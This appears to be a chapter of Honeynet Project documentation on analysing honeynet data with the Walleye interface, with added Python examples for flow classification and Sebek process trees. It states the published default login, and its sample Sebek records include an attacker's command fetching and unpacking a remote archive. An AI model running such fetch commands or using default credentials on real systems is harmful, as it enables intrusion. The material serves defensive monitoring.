7. Data Analysis
- Overview
- Summary
- Flows
- Details
- Sebek
- Future
7.1 Overview
When you get down to it, the entire purpose of deploying a honeynet is to collect data. However, that data has no value if you cannot analyze it. This was one of the greatest weaknesses of the previous Honeywall, Eeyore: it had no simple way to analyze all that data. We hope we have solved that problem with Walleye, the new web-based user interface to the Honeywall CDROM. To connect to the Walleye interface, enter the following in your browser (note that this is a secured connection using SSL):
https://ip-address-mgmt-interface
Accessing the Data Analysis section is the same as accessing the System Admin section described in Section 6: Maintaining. You will then be prompted to log in. If this is the first time you have logged in, the default user is roo and the password is honey; you will then be prompted to change the password. Change it when prompted: the default is published in this documentation, so anyone who can reach the management interface could otherwise log in. If you have already logged in before, use the updated login and password. Once you have gained access, the user interface defaults to the data analysis summary section.
7.2 Summary
When you first come to the data analysis section, you get the summary page. By default this page shows your sensor summary and a temporary IP search option (a better one is currently under development). The sensor section gives you an overview of the activity the Honeywall sees. Sensor identification is based on the management IP address of your Honeywall, so if you change that IP address you will have multiple sensors listed (there is currently no way to delete old ones). This is a known issue. We plan for Walleye to support multiple honeynets in the future; currently it supports only the local Honeywall it is installed on.
The purpose of the summary page is to give an overview of Honeywall activity. The displayed data is a combination of argus and snort data, grouped as either inbound or outbound flows. The primary source of information is flow data from argus. A flow is listed as bidirectional when we see data going in both directions, from client to server and from server to client. Total includes both bidirectional and unidirectional flows (such as inbound scans dropped by the firewall, where only the client side is ever seen), so the difference between Total and Bidirectional on the inbound side is a quick measure of how much of your traffic is probing that never got an answer. In addition, the page shows IDS alerts and network traffic volume. Anything in blue can be clicked for more information. For example, if you click on the identification number of your Honeywall sensor, you get a more detailed overview of all activity on that sensor. The sensor detail section provides administrative summary data about the Honeywall and a top-talkers report for the last 24 hours. The admin summary is geared towards distributed environments and describes the geographic and organizational location of the Honeywall. The top-talkers report shows the 25 most active sources and destinations of network connections. Clicking on the connection count gives you the flow view for those connections; clicking on the IDS events takes you to the flow view showing the flows related to those events; clicking on a host's IP address takes you to a host summary page. At the bottom is a menu for querying specific IP-based information. It is relatively self-explanatory: you can search by time/date, IP address and/or ports.
7.3 Flows
The Flows section is where you start digging into the details. Here you see an overview of all inbound and outbound connections and related activity. The listing starts with all the honeypots in order by destination IP address. You can sort the listing by any of the column headers, such as alerts. If there are multiple pages, you can reach them from the top of the menu. At the bottom left of the screen is the option to query the flows. Options include filtering by type of traffic (protocol), bidirectional only, initiated from the honeynet, time period, and Sebek tracked. The filter section lets you refine a search by screening out uninteresting data. For instance, you can ask the system to show only bidirectional TCP connections initiated from the honeynet; since a honeypot has no legitimate reason to initiate connections, this is the quickest way to spot one that has been compromised and is calling out. If you want detailed information on each and every flow for an IP address, or you want the flows listed in the order they happened, select the IP address of the system you are interested in, or the Detailed option at the bottom left, and submit your query.
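The summary counts and flow-query filters described in 7.2 and 7.3 are simple to state but easy to get backwards, so here is an added worked example (not Walleye's or argus' code) that applies the same definitions to a handful of constructed argus-style flow records: direction relative to the honeynet, bidirectional versus unidirectional, per-direction totals, top talkers, the protocol/bidirectional/from-honeynet/time filters, and the oldest-first ordering of the Detailed view. The record layout, the 10.0.0.0/24 honeynet block and the sample flows are all assumptions made for the example.

```python
"""Added example: classify argus-style flow records the way the Walleye
summary and flow-query pages describe. Not Walleye's or argus' own code;
the Flow layout and all sample values are constructed for illustration."""
from collections import Counter
from dataclasses import dataclass
from ipaddress import ip_address, ip_network


@dataclass(frozen=True)
class Flow:
    """One flow record, fields modelled loosely on argus 'ra' output."""
    start: float   # start time, seconds since epoch (constructed values)
    proto: str     # "tcp", "udp", "icmp"
    src: str       # initiator (client) address
    sport: int
    dst: str       # responder (server) address
    dport: int
    spkts: int     # packets client -> server
    dpkts: int     # packets server -> client
    sbytes: int
    dbytes: int


# Assumed honeynet address block; use whatever your Honeywall protects.
HONEYNET = ip_network("10.0.0.0/24")


def is_bidirectional(f: Flow) -> bool:
    """Walleye's definition: data seen in both directions."""
    return f.spkts > 0 and f.dpkts > 0


def direction(f: Flow, honeynet=HONEYNET) -> str:
    """'inbound' when an outside client talks to a honeypot, 'outbound'
    when a honeypot initiates, 'other' for anything else."""
    src_in = ip_address(f.src) in honeynet
    dst_in = ip_address(f.dst) in honeynet
    if dst_in and not src_in:
        return "inbound"
    if src_in and not dst_in:
        return "outbound"
    return "other"


def summarize(flows, honeynet=HONEYNET) -> dict:
    """Per-direction counts as on the sensor summary page. Total includes
    unidirectional flows such as scans the firewall dropped."""
    out = {d: {"total": 0, "bidirectional": 0, "unidirectional": 0}
           for d in ("inbound", "outbound")}
    for f in flows:
        d = direction(f, honeynet)
        if d not in out:
            continue
        out[d]["total"] += 1
        out[d]["bidirectional" if is_bidirectional(f) else "unidirectional"] += 1
    return out


def top_talkers(flows, n=25):
    """Most active sources and destinations by connection count."""
    return (Counter(f.src for f in flows).most_common(n),
            Counter(f.dst for f in flows).most_common(n))


def filter_flows(flows, proto=None, bidirectional=None, from_honeynet=None,
                 since=None, honeynet=HONEYNET):
    """Flow-query options; None means 'do not filter on this field'."""
    kept = []
    for f in flows:
        if proto is not None and f.proto != proto:
            continue
        if bidirectional is not None and is_bidirectional(f) != bidirectional:
            continue
        if from_honeynet is not None and \
                (direction(f, honeynet) == "outbound") != from_honeynet:
            continue
        if since is not None and f.start < since:
            continue
        kept.append(f)
    return kept


def details(flows):
    """Details view order: oldest connection first."""
    return sorted(flows, key=lambda f: f.start)


# Constructed sample: outside hosts use RFC 5737 documentation addresses.
FLOWS = [
    Flow(1000.0, "tcp", "192.0.2.10", 40001, "10.0.0.5", 22, 1, 0, 60, 0),       # dropped scan
    Flow(1005.0, "tcp", "192.0.2.10", 40002, "10.0.0.5", 22, 40, 38, 5200, 6100),  # ssh session
    Flow(1030.0, "tcp", "10.0.0.5", 32768, "198.51.100.7", 80, 6, 5, 480, 3900),   # honeypot calls out
    Flow(1031.0, "udp", "10.0.0.5", 32769, "198.51.100.53", 53, 1, 1, 70, 120),   # outbound DNS
    Flow(1050.0, "tcp", "203.0.113.4", 5555, "10.0.0.6", 445, 3, 0, 180, 0),       # dropped scan
    Flow(1060.0, "tcp", "203.0.113.4", 5556, "10.0.0.5", 80, 5, 4, 600, 2200),     # web request
]

if __name__ == "__main__":
    print(summarize(FLOWS))
    print(top_talkers(FLOWS, 5))
    for f in filter_flows(FLOWS, proto="tcp", bidirectional=True, from_honeynet=True):
        print("honeypot-initiated:", f)
```

Run as-is, the script prints the summary (four inbound flows of which two are bidirectional, two outbound) and the single flow that survives the "bidirectional TCP initiated from the honeynet" query, which is exactly the connection a Walleye user would want to open first.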
7.4 Details
This takes you to the Details section. Here you see each connection listed in detail. Connections are listed in the order they happened, with the oldest at the top and the newest at the bottom. Each line contains detailed information about the connection, including protocol type, number of packets and bytes involved, and the OS type of the source IP address initiating the connection. Any Snort alerts related to the connection are also listed. To the left of each connection you will see several icons. If you do NOT have Sebek installed on the honeypot, you will see only two icons for each connection, the floppy disk and the magnifying glass; each is explained below. If you do have Sebek installed on the honeypot, you will see two additional icons on the left, described in detail in the Sebek section below.
- Floppy Icon: Clicking on this image lets you download the data related to that specific flow in pcap format. Or, if you prefer, configure your browser to launch your tool of choice for pcap data, such as Ethereal (now Wireshark). This is an excellent way to do detailed analysis. Treat downloaded captures as hostile data: they contain whatever the attacker sent, so open them only on an analysis system you can afford to have compromised.
- Magnifying Glass Icon: Clicking on this image lets you analyze the connection in more detail with Snort. You get a Flow Examination section, which lets you analyze in more detail any IDS alerts, along with a Snort packet decode of the flow.
7.5 Sebek
The new user interface, Walleye, also supports the integration and analysis of Sebek data. However, it only works with the latest version, specifically the 3.X branch of Sebek. It does not work with older versions because of the new capabilities added to the Sebek client. The power of Sebek data is that it captures system activity on the honeypot itself and gives you the ability to analyze what happened there, even if the attacker came in over an encrypted channel. You know you have Sebek data for a flow when the left column shows two additional icons, specifically a blue arrow and a graph tree. Each is explained in more detail below.
- Blue Arrow Icon: Clicking on this image gives you all connections related to that specific flow.
- Graph Tree Icon: This is the most powerful of all the options. It lets you analyze in detail all system activity, including processes, files opened, etc. The first screen you get is a visual graph tree of all the processes and their children. You can click on specific processes for more information and to drill down into the processes themselves. In addition, if you click on the option at the top, View Details for this Process, you get a detailed listing of all the opened files and read activity for that process.
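To make concrete what the graph tree and View Details screens are built from, here is an added example (not Walleye's or Sebek's code) that reconstructs a process tree and per-process details from a few constructed Sebek 3-style records. The record fields (type, pid, ppid, uid, fd, com, data) follow the names Sebek 3 uses, but the dict layout, the pids, the commands and the keystrokes are all assumptions made for this illustration; a real Sebek stream is binary and must be decoded first.

```python
"""Added example: rebuild a Walleye-style process tree and per-process
details from simplified Sebek 3-style records. Not Walleye's or Sebek's own
code; record layout and all sample values are constructed."""
from collections import defaultdict

# Record types, named as Sebek 3 names them.
READ, WRITE, SOCKET, OPEN = "read", "write", "socket", "open"


def build_tree(records):
    """Map each parent pid to its children (first-seen order, no duplicates)
    and each pid to its command name."""
    children = defaultdict(list)
    command = {}
    for r in records:
        pid, ppid = r["pid"], r["ppid"]
        command.setdefault(pid, r["com"])
        if pid not in children[ppid]:
            children[ppid].append(pid)
    return children, command


def render_tree(records, root):
    """Indented text rendering of the process tree rooted at `root`,
    the textual equivalent of the graph tree screen."""
    children, command = build_tree(records)
    lines = []

    def walk(pid, depth):
        lines.append("  " * depth + f"{pid} {command.get(pid, '?')}")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    walk(root, 0)
    return lines


def subtree_pids(records, root):
    """All pids under `root` in pre-order, root included: the processes you
    can drill into from that node of the tree."""
    children, _ = build_tree(records)
    out, stack = [], [root]
    while stack:
        pid = stack.pop()
        out.append(pid)
        stack.extend(reversed(children.get(pid, [])))
    return out


def process_details(records, pid):
    """'View Details for this Process': opened files and read activity.
    Sebek logs each read() separately, so the read records are concatenated
    to recover what was typed at the shell."""
    opened = [r["data"] for r in records if r["pid"] == pid and r["type"] == OPEN]
    reads = "".join(r["data"] for r in records if r["pid"] == pid and r["type"] == READ)
    com = next((r["com"] for r in records if r["pid"] == pid), None)
    return {"command": com, "opened_files": opened, "read_activity": reads}


# Constructed records: an SSH login spawns a shell, which fetches and unpacks a file.
RECORDS = [
    {"type": SOCKET, "pid": 1200, "ppid": 1, "uid": 0, "fd": 4, "com": "sshd", "data": ""},
    {"type": READ, "pid": 1300, "ppid": 1200, "uid": 0, "fd": 0, "com": "bash", "data": "id\n"},
    {"type": READ, "pid": 1300, "ppid": 1200, "uid": 0, "fd": 0, "com": "bash", "data": "uname -a\n"},
    {"type": READ, "pid": 1300, "ppid": 1200, "uid": 0, "fd": 0, "com": "bash",
     "data": "wget http://203.0.113.9/tool.tgz\n"},
    {"type": OPEN, "pid": 1310, "ppid": 1300, "uid": 0, "fd": 3, "com": "wget", "data": "/tmp/tool.tgz"},
    {"type": READ, "pid": 1300, "ppid": 1200, "uid": 0, "fd": 0, "com": "bash", "data": "tar xzf tool.tgz\n"},
    {"type": OPEN, "pid": 1320, "ppid": 1300, "uid": 0, "fd": 3, "com": "tar", "data": "/tmp/tool.tgz"},
]

if __name__ == "__main__":
    print("\n".join(render_tree(RECORDS, 1200)))
    print(process_details(RECORDS, 1300))
    print(process_details(RECORDS, 1310))
```

The tree makes the parent/child relationship visible (sshd, then the shell it spawned, then the tools the shell ran), and the details of the shell process give the keystrokes back in order even though the session itself came in over SSH.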
7.6 Future
Of all the functionality of the CDROM, the part that will undergo the most active development and change is the data analysis user interface. We have a tremendous number of features we are attempting to add. Some of these include:
- Suspicious Tracking: The ability to highlight any suspicious connection indicating a compromise.
- Sebek Interface: The ability to quickly determine the attacker's activities based on Sebek data, such as their keystrokes, or to recover files they uploaded.
- Reporting: The ability to generate reports on activity.
- Distributed: The ability to correlate and analyze data from multiple honeynets.